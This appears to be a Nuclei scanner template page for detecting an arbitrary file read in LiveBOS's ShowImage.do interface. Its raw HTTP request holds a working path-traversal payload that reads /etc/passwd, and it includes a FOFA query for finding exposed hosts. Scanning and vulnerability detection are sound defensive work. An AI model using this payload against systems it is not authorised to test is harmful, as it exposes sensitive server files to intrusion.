LiveBOS ShowImage.do - Arbitrary File Read

ID: livebos-file-read

Severity: high

Author: yusakie

Tags: livebos,lfi

Description

An arbitrary file read vulnerability exists in the LiveBOS ShowImage.do interface, which can be exploited to obtain sensitive files from the server.

YAML Source

id: livebos-file-read

info:
  name: LiveBOS ShowImage.do - Arbitrary File Read
  author: yusakie
  severity: high
  description: |
    An arbitrary file read vulnerability exists in the LiveBOS ShowImage.do interface, which can be exploited to obtain sensitive files from the server.
  reference:
    - https://www.wevul.com/2301.html
  metadata:
    verified: "true"
    max-request: 2
    fofa-query: app="LiveBOS-框架" && body="管理控制台"
  tags: livebos,lfi

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "Power by LiveBOS")
          - regex('root:.*:0', body_2)
          - status_code_2 == 200
        condition: and
# digest: 4a0a00473045022100c5cddf00f535f3b40cea137fbcda55ffb7281f414a4db6428ac9a826a1c3280c02204649db4b8e1818eead9e3802c44c6c2d67f5d85ca3d87982f0a3439d03b0599c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/other/livebos-file-read.yaml"

View on Github